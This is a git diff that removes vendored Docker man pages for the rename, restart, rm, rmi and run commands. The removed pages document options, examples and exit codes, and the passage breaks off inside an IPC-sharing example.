DESCRIPTION -Rename a container. Container may be running, paused or stopped. diff --git a/vendor/github.com/docker/docker/man/docker-restart.1.md b/vendor/github.com/docker/docker/man/docker-restart.1.md deleted file mode 100644 index 271c4eee1b..0000000000 --- a/vendor/github.com/docker/docker/man/docker-restart.1.md +++ /dev/null @@ -1,26 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-restart - Restart one or more containers - -# SYNOPSIS -**docker restart** -[**--help**] -[**-t**|**--time**[=*10*]] -CONTAINER [CONTAINER...] - -# DESCRIPTION -Restart each container listed. - -# OPTIONS -**--help** - Print usage statement - -**-t**, **--time**=*10* - Number of seconds to try to stop for before killing the container. Once killed it will then be restarted. Default is 10 seconds. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-rm.1.md b/vendor/github.com/docker/docker/man/docker-rm.1.md deleted file mode 100644 index 2105288d0d..0000000000 --- a/vendor/github.com/docker/docker/man/docker-rm.1.md +++ /dev/null @@ -1,72 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-rm - Remove one or more containers - -# SYNOPSIS -**docker rm** -[**-f**|**--force**] -[**-l**|**--link**] -[**-v**|**--volumes**] -CONTAINER [CONTAINER...] - -# DESCRIPTION - -**docker rm** will remove one or more containers from the host node. The -container name or ID can be used. This does not remove images. You cannot -remove a running container unless you use the **-f** option. To see all -containers on a host use the **docker ps -a** command. - -# OPTIONS -**--help** - Print usage statement - -**-f**, **--force**=*true*|*false* - Force the removal of a running container (uses SIGKILL). The default is *false*. - -**-l**, **--link**=*true*|*false* - Remove the specified link and not the underlying container. The default is *false*. - -**-v**, **--volumes**=*true*|*false* - Remove the volumes associated with the container. The default is *false*. - -# EXAMPLES - -## Removing a container using its ID - -To remove a container using its ID, find either from a **docker ps -a** -command, or use the ID returned from the **docker run** command, or retrieve -it from a file used to store it using the **docker run --cidfile**: - - docker rm abebf7571666 - -## Removing a container using the container name - -The name of the container can be found using the **docker ps -a** -command. The use that name as follows: - - docker rm hopeful_morse - -## Removing a container and all associated volumes - - $ docker rm -v redis - redis - -This command will remove the container and any volumes associated with it. -Note that if a volume was specified with a name, it will not be removed. - - $ docker create -v awesome:/foo -v /bar --name hello redis - hello - $ docker rm -v hello - -In this example, the volume for `/foo` will remain in tact, but the volume for -`/bar` will be removed. The same behavior holds for volumes inherited with -`--volumes-from`. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -July 2014, updated by Sven Dowideit -August 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-rmi.1.md b/vendor/github.com/docker/docker/man/docker-rmi.1.md deleted file mode 100644 index 35bf8aac6a..0000000000 --- a/vendor/github.com/docker/docker/man/docker-rmi.1.md +++ /dev/null @@ -1,42 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-rmi - Remove one or more images - -# SYNOPSIS -**docker rmi** -[**-f**|**--force**] -[**--help**] -[**--no-prune**] -IMAGE [IMAGE...] - -# DESCRIPTION - -Removes one or more images from the host node. This does not remove images from -a registry. You cannot remove an image of a running container unless you use the -**-f** option. To see all images on a host use the **docker images** command. - -# OPTIONS -**-f**, **--force**=*true*|*false* - Force removal of the image. The default is *false*. - -**--help** - Print usage statement - -**--no-prune**=*true*|*false* - Do not delete untagged parents. The default is *false*. - -# EXAMPLES - -## Removing an image - -Here is an example of removing an image: - - docker rmi fedora/httpd - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -April 2015, updated by Mary Anthony for v2 diff --git a/vendor/github.com/docker/docker/man/docker-run.1.md b/vendor/github.com/docker/docker/man/docker-run.1.md deleted file mode 100644 index 8c1018a1e2..0000000000 --- a/vendor/github.com/docker/docker/man/docker-run.1.md +++ /dev/null @@ -1,1055 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-run - Run a command in a new container - -# SYNOPSIS -**docker run** -[**-a**|**--attach**[=*[]*]] -[**--add-host**[=*[]*]] -[**--blkio-weight**[=*[BLKIO-WEIGHT]*]] -[**--blkio-weight-device**[=*[]*]] -[**--cpu-shares**[=*0*]] -[**--cap-add**[=*[]*]] -[**--cap-drop**[=*[]*]] -[**--cgroup-parent**[=*CGROUP-PATH*]] -[**--cidfile**[=*CIDFILE*]] -[**--cpu-count**[=*0*]] -[**--cpu-percent**[=*0*]] -[**--cpu-period**[=*0*]] -[**--cpu-quota**[=*0*]] -[**--cpu-rt-period**[=*0*]] -[**--cpu-rt-runtime**[=*0*]] -[**--cpus**[=*0.0*]] -[**--cpuset-cpus**[=*CPUSET-CPUS*]] -[**--cpuset-mems**[=*CPUSET-MEMS*]] -[**-d**|**--detach**] -[**--detach-keys**[=*[]*]] -[**--device**[=*[]*]] -[**--device-read-bps**[=*[]*]] -[**--device-read-iops**[=*[]*]] -[**--device-write-bps**[=*[]*]] -[**--device-write-iops**[=*[]*]] -[**--dns**[=*[]*]] -[**--dns-option**[=*[]*]] -[**--dns-search**[=*[]*]] -[**-e**|**--env**[=*[]*]] -[**--entrypoint**[=*ENTRYPOINT*]] -[**--env-file**[=*[]*]] -[**--expose**[=*[]*]] -[**--group-add**[=*[]*]] -[**-h**|**--hostname**[=*HOSTNAME*]] -[**--help**] -[**--init**] -[**--init-path**[=*[]*]] -[**-i**|**--interactive**] -[**--ip**[=*IPv4-ADDRESS*]] -[**--ip6**[=*IPv6-ADDRESS*]] -[**--ipc**[=*IPC*]] -[**--isolation**[=*default*]] -[**--kernel-memory**[=*KERNEL-MEMORY*]] -[**-l**|**--label**[=*[]*]] -[**--label-file**[=*[]*]] -[**--link**[=*[]*]] -[**--link-local-ip**[=*[]*]] -[**--log-driver**[=*[]*]] -[**--log-opt**[=*[]*]] -[**-m**|**--memory**[=*MEMORY*]] -[**--mac-address**[=*MAC-ADDRESS*]] -[**--memory-reservation**[=*MEMORY-RESERVATION*]] -[**--memory-swap**[=*LIMIT*]] -[**--memory-swappiness**[=*MEMORY-SWAPPINESS*]] -[**--name**[=*NAME*]] -[**--network-alias**[=*[]*]] -[**--network**[=*"bridge"*]] -[**--oom-kill-disable**] -[**--oom-score-adj**[=*0*]] -[**-P**|**--publish-all**] -[**-p**|**--publish**[=*[]*]] -[**--pid**[=*[PID]*]] -[**--userns**[=*[]*]] -[**--pids-limit**[=*PIDS_LIMIT*]] -[**--privileged**] -[**--read-only**] -[**--restart**[=*RESTART*]] -[**--rm**] -[**--security-opt**[=*[]*]] -[**--storage-opt**[=*[]*]] -[**--stop-signal**[=*SIGNAL*]] -[**--stop-timeout**[=*TIMEOUT*]] -[**--shm-size**[=*[]*]] -[**--sig-proxy**[=*true*]] -[**--sysctl**[=*[]*]] -[**-t**|**--tty**] -[**--tmpfs**[=*[CONTAINER-DIR[:]*]] -[**-u**|**--user**[=*USER*]] -[**--ulimit**[=*[]*]] -[**--uts**[=*[]*]] -[**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]] -[**--volume-driver**[=*DRIVER*]] -[**--volumes-from**[=*[]*]] -[**-w**|**--workdir**[=*WORKDIR*]] -IMAGE [COMMAND] [ARG...] - -# DESCRIPTION - -Run a process in a new container. **docker run** starts a process with its own -file system, its own networking, and its own isolated process tree. The IMAGE -which starts the process may define defaults related to the process that will be -run in the container, the networking to expose, and more, but **docker run** -gives final control to the operator or administrator who starts the container -from the image. For that reason **docker run** has more options than any other -Docker command. - -If the IMAGE is not already loaded then **docker run** will pull the IMAGE, and -all image dependencies, from the repository in the same way running **docker -pull** IMAGE, before it starts the container from that image. - -# OPTIONS -**-a**, **--attach**=[] - Attach to STDIN, STDOUT or STDERR. - - In foreground mode (the default when **-d** -is not specified), **docker run** can start the process in the container -and attach the console to the process's standard input, output, and standard -error. It can even pretend to be a TTY (this is what most commandline -executables expect) and pass along signals. The **-a** option can be set for -each of stdin, stdout, and stderr. - -**--add-host**=[] - Add a custom host-to-IP mapping (host:ip) - - Add a line to /etc/hosts. The format is hostname:ip. The **--add-host** -option can be set multiple times. - -**--blkio-weight**=*0* - Block IO weight (relative weight) accepts a weight value between 10 and 1000. - -**--blkio-weight-device**=[] - Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`). - -**--cpu-shares**=*0* - CPU shares (relative weight) - - By default, all containers get the same proportion of CPU cycles. This proportion -can be modified by changing the container's CPU share weighting relative -to the weighting of all other running containers. - -To modify the proportion from the default of 1024, use the **--cpu-shares** -flag to set the weighting to 2 or higher. - -The proportion will only apply when CPU-intensive processes are running. -When tasks in one container are idle, other containers can use the -left-over CPU time. The actual amount of CPU time will vary depending on -the number of containers running on the system. - -For example, consider three containers, one has a cpu-share of 1024 and -two others have a cpu-share setting of 512. When processes in all three -containers attempt to use 100% of CPU, the first container would receive -50% of the total CPU time. If you add a fourth container with a cpu-share -of 1024, the first container only gets 33% of the CPU. The remaining containers -receive 16.5%, 16.5% and 33% of the CPU. - -On a multi-core system, the shares of CPU time are distributed over all CPU -cores. Even if a container is limited to less than 100% of CPU time, it can -use 100% of each individual CPU core. - -For example, consider a system with more than three cores. If you start one -container **{C0}** with **-c=512** running one process, and another container -**{C1}** with **-c=1024** running two processes, this can result in the following -division of CPU shares: - - PID container CPU CPU share - 100 {C0} 0 100% of CPU0 - 101 {C1} 1 100% of CPU1 - 102 {C1} 2 100% of CPU2 - -**--cap-add**=[] - Add Linux capabilities - -**--cap-drop**=[] - Drop Linux capabilities - -**--cgroup-parent**="" - Path to cgroups under which the cgroup for the container will be created. If the path is not absolute, the path is considered to be relative to the cgroups path of the init process. Cgroups will be created if they do not already exist. - -**--cidfile**="" - Write the container ID to the file - -**--cpu-count**=*0* - Limit the number of CPUs available for execution by the container. - - On Windows Server containers, this is approximated as a percentage of total CPU usage. - - On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last. - -**--cpu-percent**=*0* - Limit the percentage of CPU available for execution by a container running on a Windows daemon. - - On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last. - -**--cpu-period**=*0* - Limit the CPU CFS (Completely Fair Scheduler) period - - Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify. - -**--cpuset-cpus**="" - CPUs in which to allow execution (0-3, 0,1) - -**--cpuset-mems**="" - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. - - If you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1` -then processes in your Docker container will only use memory from the first -two memory nodes. - -**--cpu-quota**=*0* - Limit the CPU CFS (Completely Fair Scheduler) quota - - Limit the container's CPU usage. By default, containers run with the full -CPU resource. This flag tell the kernel to restrict the container's CPU usage -to the quota you specify. - -**--cpu-rt-period**=0 - Limit the CPU real-time period in microseconds - - Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify. - -**--cpu-rt-runtime**=0 - Limit the CPU real-time runtime in microseconds - - Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex: - Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks. - - The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup. - -**--cpus**=0.0 - Number of CPUs. The default is *0.0* which means no limit. - -**-d**, **--detach**=*true*|*false* - Detached mode: run the container in the background and print the new container ID. The default is *false*. - - At any time you can run **docker ps** in -the other shell to view a list of the running containers. You can reattach to a -detached container with **docker attach**. If you choose to run a container in -the detached mode, then you cannot use the **-rm** option. - - When attached in the tty mode, you can detach from the container (and leave it -running) using a configurable key sequence. The default sequence is `CTRL-p CTRL-q`. -You configure the key sequence using the **--detach-keys** option or a configuration file. -See **config-json(5)** for documentation on using a configuration file. - -**--detach-keys**="" - Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. - -**--device**=[] - Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm) - -**--device-read-bps**=[] - Limit read rate from a device (e.g. --device-read-bps=/dev/sda:1mb) - -**--device-read-iops**=[] - Limit read rate from a device (e.g. --device-read-iops=/dev/sda:1000) - -**--device-write-bps**=[] - Limit write rate to a device (e.g. --device-write-bps=/dev/sda:1mb) - -**--device-write-iops**=[] - Limit write rate to a device (e.g. --device-write-iops=/dev/sda:1000) - -**--dns-search**=[] - Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain) - -**--dns-option**=[] - Set custom DNS options - -**--dns**=[] - Set custom DNS servers - - This option can be used to override the DNS -configuration passed to the container. Typically this is necessary when the -host DNS configuration is invalid for the container (e.g., 127.0.0.1). When this -is the case the **--dns** flags is necessary for every run. - -**-e**, **--env**=[] - Set environment variables - - This option allows you to specify arbitrary -environment variables that are available for the process that will be launched -inside of the container. - -**--entrypoint**="" - Overwrite the default ENTRYPOINT of the image - - This option allows you to overwrite the default entrypoint of the image that -is set in the Dockerfile. The ENTRYPOINT of an image is similar to a COMMAND -because it specifies what executable to run when the container starts, but it is -(purposely) more difficult to override. The ENTRYPOINT gives a container its -default nature or behavior, so that when you set an ENTRYPOINT you can run the -container as if it were that binary, complete with default options, and you can -pass in more options via the COMMAND. But, sometimes an operator may want to run -something else inside the container, so you can override the default ENTRYPOINT -at runtime by using a **--entrypoint** and a string to specify the new -ENTRYPOINT. - -**--env-file**=[] - Read in a line delimited file of environment variables - -**--expose**=[] - Expose a port, or a range of ports (e.g. --expose=3300-3310) informs Docker -that the container listens on the specified network ports at runtime. Docker -uses this information to interconnect containers using links and to set up port -redirection on the host system. - -**--group-add**=[] - Add additional groups to run as - -**-h**, **--hostname**="" - Container host name - - Sets the container host name that is available inside the container. - -**--help** - Print usage statement - -**--init** - Run an init inside the container that forwards signals and reaps processes - -**--init-path**="" - Path to the docker-init binary - -**-i**, **--interactive**=*true*|*false* - Keep STDIN open even if not attached. The default is *false*. - - When set to true, keep stdin open even if not attached. The default is false. - -**--ip**="" - Sets the container's interface IPv4 address (e.g. 172.23.0.9) - - It can only be used in conjunction with **--network** for user-defined networks - -**--ip6**="" - Sets the container's interface IPv6 address (e.g. 2001:db8::1b99) - - It can only be used in conjunction with **--network** for user-defined networks - -**--ipc**="" - Default is to create a private IPC namespace (POSIX SysV IPC) for the container - 'container:': reuses another container shared memory, semaphores and message queues - 'host': use the host shared memory,semaphores and message queues inside the container. Note: the host mode gives the container full access to local shared memory and is therefore considered insecure. - -**--isolation**="*default*" - Isolation specifies the type of isolation technology used by containers. Note -that the default on Windows server is `process`, and the default on Windows client -is `hyperv`. Linux only supports `default`. - -**-l**, **--label**=[] - Set metadata on the container (e.g., --label com.example.key=value) - -**--kernel-memory**="" - Kernel memory limit (format: `[]`, where unit = b, k, m or g) - - Constrains the kernel memory available to a container. If a limit of 0 -is specified (not using `--kernel-memory`), the container's kernel memory -is not limited. If you specify a limit, it may be rounded up to a multiple -of the operating system's page size and the value can be very large, -millions of trillions. - -**--label-file**=[] - Read in a line delimited file of labels - -**--link**=[] - Add link to another container in the form of :alias or just -in which case the alias will match the name - - If the operator -uses **--link** when starting the new client container, then the client -container can access the exposed port via a private networking interface. Docker -will set some environment variables in the client container to help indicate -which interface and port to use. - -**--link-local-ip**=[] - Add one or more link-local IPv4/IPv6 addresses to the container's interface - -**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*" - Logging driver for the container. Default is defined by daemon `--log-driver` flag. - **Warning**: the `docker logs` command works only for the `json-file` and - `journald` logging drivers. - -**--log-opt**=[] - Logging driver specific options. - -**-m**, **--memory**="" - Memory limit (format: [], where unit = b, k, m or g) - - Allows you to constrain the memory available to a container. If the host -supports swap memory, then the **-m** memory setting can be larger than physical -RAM. If a limit of 0 is specified (not using **-m**), the container's memory is -not limited. The actual limit may be rounded up to a multiple of the operating -system's page size (the value would be very large, that's millions of trillions). - -**--memory-reservation**="" - Memory soft limit (format: [], where unit = b, k, m or g) - - After setting memory reservation, when the system detects memory contention -or low memory, containers are forced to restrict their consumption to their -reservation. So you should always set the value below **--memory**, otherwise the -hard limit will take precedence. By default, memory reservation will be the same -as memory limit. - -**--memory-swap**="LIMIT" - A limit value equal to memory plus swap. Must be used with the **-m** -(**--memory**) flag. The swap `LIMIT` should always be larger than **-m** -(**--memory**) value. By default, the swap `LIMIT` will be set to double -the value of --memory. - - The format of `LIMIT` is `[]`. Unit can be `b` (bytes), -`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a -unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap. - -**--mac-address**="" - Container MAC address (e.g. 92:d0:c6:0a:29:33) - - Remember that the MAC address in an Ethernet network must be unique. -The IPv6 link-local address will be based on the device's MAC address -according to RFC4862. - -**--name**="" - Assign a name to the container - - The operator can identify a container in three ways: - UUID long identifier (“f78375b1c487e03c9438c729345e54db9d20cfa2ac1fc3494b6eb60872e74778”) - UUID short identifier (“f78375b1c487”) - Name (“jonah”) - - The UUID identifiers come from the Docker daemon, and if a name is not assigned -to the container with **--name** then the daemon will also generate a random -string name. The name is useful when defining links (see **--link**) (or any -other place you need to identify a container). This works for both background -and foreground Docker containers. - -**--network**="*bridge*" - Set the Network mode for the container - 'bridge': create a network stack on the default Docker bridge - 'none': no networking - 'container:': reuse another container's network stack - 'host': use the Docker host network stack. Note: the host mode gives the container full access to local system services such as D-bus and is therefore considered insecure. - '|': connect to a user-defined network - -**--network-alias**=[] - Add network-scoped alias for the container - -**--oom-kill-disable**=*true*|*false* - Whether to disable OOM Killer for the container or not. - -**--oom-score-adj**="" - Tune the host's OOM preferences for containers (accepts -1000 to 1000) - -**-P**, **--publish-all**=*true*|*false* - Publish all exposed ports to random ports on the host interfaces. The default is *false*. - - When set to true publish all exposed ports to the host interfaces. The -default is false. If the operator uses -P (or -p) then Docker will make the -exposed port accessible on the host and the ports will be available to any -client that can reach the host. When using -P, Docker will bind any exposed -port to a random port on the host within an *ephemeral port range* defined by -`/proc/sys/net/ipv4/ip_local_port_range`. To find the mapping between the host -ports and the exposed ports, use `docker port`. - -**-p**, **--publish**=[] - Publish a container's port, or range of ports, to the host. - - Format: `ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort` -Both hostPort and containerPort can be specified as a range of ports. -When specifying ranges for both, the number of container ports in the range must match the number of host ports in the range. -(e.g., `docker run -p 1234-1236:1222-1224 --name thisWorks -t busybox` -but not `docker run -p 1230-1236:1230-1240 --name RangeContainerPortsBiggerThanRangeHostPorts -t busybox`) -With ip: `docker run -p 127.0.0.1:$HOSTPORT:$CONTAINERPORT --name CONTAINER -t someimage` -Use `docker port` to see the actual mapping: `docker port CONTAINER $CONTAINERPORT` - -**--pid**="" - Set the PID mode for the container - Default is to create a private PID namespace for the container - 'container:': join another container's PID namespace - 'host': use the host's PID namespace for the container. Note: the host mode gives the container full access to local PID and is therefore considered insecure. - -**--userns**="" - Set the usernamespace mode for the container when `userns-remap` option is enabled. - **host**: use the host usernamespace and enable all privileged options (e.g., `pid=host` or `--privileged`). - -**--pids-limit**="" - Tune the container's pids limit. Set `-1` to have unlimited pids for the container. - -**--uts**=*host* - Set the UTS mode for the container - **host**: use the host's UTS namespace inside the container. - Note: the host mode gives the container access to changing the host's hostname and is therefore considered insecure. - -**--privileged**=*true*|*false* - Give extended privileges to this container. The default is *false*. - - By default, Docker containers are -“unprivileged” (=false) and cannot, for example, run a Docker daemon inside the -Docker container. This is because by default a container is not allowed to -access any devices. A “privileged” container is given access to all devices. - - When the operator executes **docker run --privileged**, Docker will enable access -to all devices on the host as well as set some configuration in AppArmor to -allow the container nearly all the same access to the host as processes running -outside of a container on the host. - -**--read-only**=*true*|*false* - Mount the container's root filesystem as read only. - - By default a container will have its root filesystem writable allowing processes -to write files anywhere. By specifying the `--read-only` flag the container will have -its root filesystem mounted as read only prohibiting any writes. - -**--restart**="*no*" - Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped). - -**--rm**=*true*|*false* - Automatically remove the container when it exits. The default is *false*. - `--rm` flag can work together with `-d`, and auto-removal will be done on daemon side. Note that it's -incompatible with any restart policy other than `none`. - -**--security-opt**=[] - Security Options - - "label=user:USER" : Set the label user for the container - "label=role:ROLE" : Set the label role for the container - "label=type:TYPE" : Set the label type for the container - "label=level:LEVEL" : Set the label level for the container - "label=disable" : Turn off label confinement for the container - "no-new-privileges" : Disable container processes from gaining additional privileges - - "seccomp=unconfined" : Turn off seccomp confinement for the container - "seccomp=profile.json : White listed syscalls seccomp Json file to be used as a seccomp filter - - "apparmor=unconfined" : Turn off apparmor confinement for the container - "apparmor=your-profile" : Set the apparmor confinement profile for the container - -**--storage-opt**=[] - Storage driver options per container - - $ docker run -it --storage-opt size=120G fedora /bin/bash - - This (size) will allow to set the container rootfs size to 120G at creation time. - This option is only available for the `devicemapper`, `btrfs`, `overlay2` and `zfs` graph drivers. - For the `devicemapper`, `btrfs` and `zfs` storage drivers, user cannot pass a size less than the Default BaseFS Size. - For the `overlay2` storage driver, the size option is only available if the backing fs is `xfs` and mounted with the `pquota` mount option. - Under these conditions, user can pass any size less then the backing fs size. - -**--stop-signal**=*SIGTERM* - Signal to stop a container. Default is SIGTERM. - -**--stop-timeout**=*10* - Timeout (in seconds) to stop a container. Default is 10. - -**--shm-size**="" - Size of `/dev/shm`. The format is ``. - `number` must be greater than `0`. Unit is optional and can be `b` (bytes), `k` (kilobytes), `m`(megabytes), or `g` (gigabytes). - If you omit the unit, the system uses bytes. If you omit the size entirely, the system uses `64m`. - -**--sysctl**=SYSCTL - Configure namespaced kernel parameters at runtime - - IPC Namespace - current sysctls allowed: - - kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced - Sysctls beginning with fs.mqueue.* - - If you use the `--ipc=host` option these sysctls will not be allowed. - - Network Namespace - current sysctls allowed: - Sysctls beginning with net.* - - If you use the `--network=host` option these sysctls will not be allowed. - -**--sig-proxy**=*true*|*false* - Proxy received signals to the process (non-TTY mode only). SIGCHLD, SIGSTOP, and SIGKILL are not proxied. The default is *true*. - -**--memory-swappiness**="" - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. - -**-t**, **--tty**=*true*|*false* - Allocate a pseudo-TTY. The default is *false*. - - When set to true Docker can allocate a pseudo-tty and attach to the standard -input of any container. This can be used, for example, to run a throwaway -interactive shell. The default is false. - -The **-t** option is incompatible with a redirection of the docker client -standard input. - -**--tmpfs**=[] Create a tmpfs mount - - Mount a temporary filesystem (`tmpfs`) mount into a container, for example: - - $ docker run -d --tmpfs /tmp:rw,size=787448k,mode=1777 my_image - - This command mounts a `tmpfs` at `/tmp` within the container. The supported mount -options are the same as the Linux default `mount` flags. If you do not specify -any options, the systems uses the following options: -`rw,noexec,nosuid,nodev,size=65536k`. - -**-u**, **--user**="" - Sets the username or UID used and optionally the groupname or GID for the specified command. - - The followings examples are all valid: - --user [user | user:group | uid | uid:gid | user:gid | uid:group ] - - Without this argument the command will be run as root in the container. - -**--ulimit**=[] - Ulimit options - -**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*] - Create a bind mount. If you specify, ` -v /HOST-DIR:/CONTAINER-DIR`, Docker - bind mounts `/HOST-DIR` in the host to `/CONTAINER-DIR` in the Docker - container. If 'HOST-DIR' is omitted, Docker automatically creates the new - volume on the host. The `OPTIONS` are a comma delimited list and can be: - - * [rw|ro] - * [z|Z] - * [`[r]shared`|`[r]slave`|`[r]private`] - * [nocopy] - -The `CONTAINER-DIR` must be an absolute path such as `/src/docs`. The `HOST-DIR` -can be an absolute path or a `name` value. A `name` value must start with an -alphanumeric character, followed by `a-z0-9`, `_` (underscore), `.` (period) or -`-` (hyphen). An absolute path starts with a `/` (forward slash). - -If you supply a `HOST-DIR` that is an absolute path, Docker bind-mounts to the -path you specify. If you supply a `name`, Docker creates a named volume by that -`name`. For example, you can specify either `/foo` or `foo` for a `HOST-DIR` -value. If you supply the `/foo` value, Docker creates a bind-mount. If you -supply the `foo` specification, Docker creates a named volume. - -You can specify multiple **-v** options to mount one or more mounts to a -container. To use these same mounts in other containers, specify the -**--volumes-from** option also. - -You can add `:ro` or `:rw` suffix to a volume to mount it read-only or -read-write mode, respectively. By default, the volumes are mounted read-write. -See examples. - -Labeling systems like SELinux require that proper labels are placed on volume -content mounted into a container. Without a label, the security system might -prevent the processes running inside the container from using the content. By -default, Docker does not change the labels set by the OS. - -To change a label in the container context, you can add either of two suffixes -`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file -objects on the shared volumes. The `z` option tells Docker that two containers -share the volume content. As a result, Docker labels the content with a shared -content label. Shared volume labels allow all containers to read/write content. -The `Z` option tells Docker to label the content with a private unshared label. -Only the current container can use a private volume. - -By default bind mounted volumes are `private`. That means any mounts done -inside container will not be visible on host and vice-a-versa. One can change -this behavior by specifying a volume mount propagation property. Making a -volume `shared` mounts done under that volume inside container will be -visible on host and vice-a-versa. Making a volume `slave` enables only one -way mount propagation and that is mounts done on host under that volume -will be visible inside container but not the other way around. - -To control mount propagation property of volume one can use `:[r]shared`, -`:[r]slave` or `:[r]private` propagation flag. Propagation property can -be specified only for bind mounted volumes and not for internal volumes or -named volumes. For mount propagation to work source mount point (mount point -where source dir is mounted on) has to have right propagation properties. For -shared volumes, source mount point has to be shared. And for slave volumes, -source mount has to be either shared or slave. - -Use `df ` to figure out the source mount and then use -`findmnt -o TARGET,PROPAGATION ` to figure out propagation -properties of source mount. If `findmnt` utility is not available, then one -can look at mount entry for source mount point in `/proc/self/mountinfo`. Look -at `optional fields` and see if any propagaion properties are specified. -`shared:X` means mount is `shared`, `master:X` means mount is `slave` and if -nothing is there that means mount is `private`. - -To change propagation properties of a mount point use `mount` command. For -example, if one wants to bind mount source directory `/foo` one can do -`mount --bind /foo /foo` and `mount --make-private --make-shared /foo`. This -will convert /foo into a `shared` mount point. Alternatively one can directly -change propagation properties of source mount. Say `/` is source mount for -`/foo`, then use `mount --make-shared /` to convert `/` into a `shared` mount. - -> **Note**: -> When using systemd to manage the Docker daemon's start and stop, in the systemd -> unit file there is an option to control mount propagation for the Docker daemon -> itself, called `MountFlags`. The value of this setting may cause Docker to not -> see mount propagation changes made on the mount point. For example, if this value -> is `slave`, you may not be able to use the `shared` or `rshared` propagation on -> a volume. - -To disable automatic copying of data from the container path to the volume, use -the `nocopy` flag. The `nocopy` flag can be set on bind mounts and named volumes. - -**--volume-driver**="" - Container's volume driver. This driver creates volumes specified either from - a Dockerfile's `VOLUME` instruction or from the `docker run -v` flag. - See **docker-volume-create(1)** for full details. - -**--volumes-from**=[] - Mount volumes from the specified container(s) - - Mounts already mounted volumes from a source container onto another - container. You must supply the source's container-id. To share - a volume, use the **--volumes-from** option when running - the target container. You can share volumes even if the source container - is not running. - - By default, Docker mounts the volumes in the same mode (read-write or - read-only) as it is mounted in the source container. Optionally, you - can change this by suffixing the container-id with either the `:ro` or - `:rw ` keyword. - - If the location of the volume from the source container overlaps with - data residing on a target container, then the volume hides - that data on the target. - -**-w**, **--workdir**="" - Working directory inside the container - - The default working directory for -running binaries within a container is the root directory (/). The developer can -set a different default with the Dockerfile WORKDIR instruction. The operator -can override the working directory by using the **-w** option. - -# Exit Status - -The exit code from `docker run` gives information about why the container -failed to run or why it exited. When `docker run` exits with a non-zero code, -the exit codes follow the `chroot` standard, see below: - -**_125_** if the error is with Docker daemon **_itself_** - - $ docker run --foo busybox; echo $? - # flag provided but not defined: --foo - See 'docker run --help'. - 125 - -**_126_** if the **_contained command_** cannot be invoked - - $ docker run busybox /etc; echo $? - # exec: "/etc": permission denied - docker: Error response from daemon: Contained command could not be invoked - 126 - -**_127_** if the **_contained command_** cannot be found - - $ docker run busybox foo; echo $? - # exec: "foo": executable file not found in $PATH - docker: Error response from daemon: Contained command not found or does not exist - 127 - -**_Exit code_** of **_contained command_** otherwise - - $ docker run busybox /bin/sh -c 'exit 3' - # 3 - -# EXAMPLES - -## Running container in read-only mode - -During container image development, containers often need to write to the image -content. Installing packages into /usr, for example. In production, -applications seldom need to write to the image. Container applications write -to volumes if they need to write to file systems at all. Applications can be -made more secure by running them in read-only mode using the --read-only switch. -This protects the containers image from modification. Read only containers may -still need to write temporary data. The best way to handle this is to mount -tmpfs directories on /run and /tmp. - - # docker run --read-only --tmpfs /run --tmpfs /tmp -i -t fedora /bin/bash - -## Exposing log messages from the container to the host's log - -If you want messages that are logged in your container to show up in the host's -syslog/journal then you should bind mount the /dev/log directory as follows. - - # docker run -v /dev/log:/dev/log -i -t fedora /bin/bash - -From inside the container you can test this by sending a message to the log. - - (bash)# logger "Hello from my container" - -Then exit and check the journal. - - # exit - - # journalctl -b | grep Hello - -This should list the message sent to logger. - -## Attaching to one or more from STDIN, STDOUT, STDERR - -If you do not specify -a then Docker will attach everything (stdin,stdout,stderr) -. You can specify to which of the three standard streams (stdin, stdout, stderr) -you'd like to connect instead, as in: - - # docker run -a stdin -a stdout -i -t fedora /bin/bash - -## Sharing IPC between containers - -Using shm_server.c available here: https://www.cs.cf.ac.uk/Dave/C/node27.html - -Testing `--ipc=host` mode: - -Host shows a shared memory segment with 7 pids attached, happens to be from httpd: - -``` - $ sudo ipcs 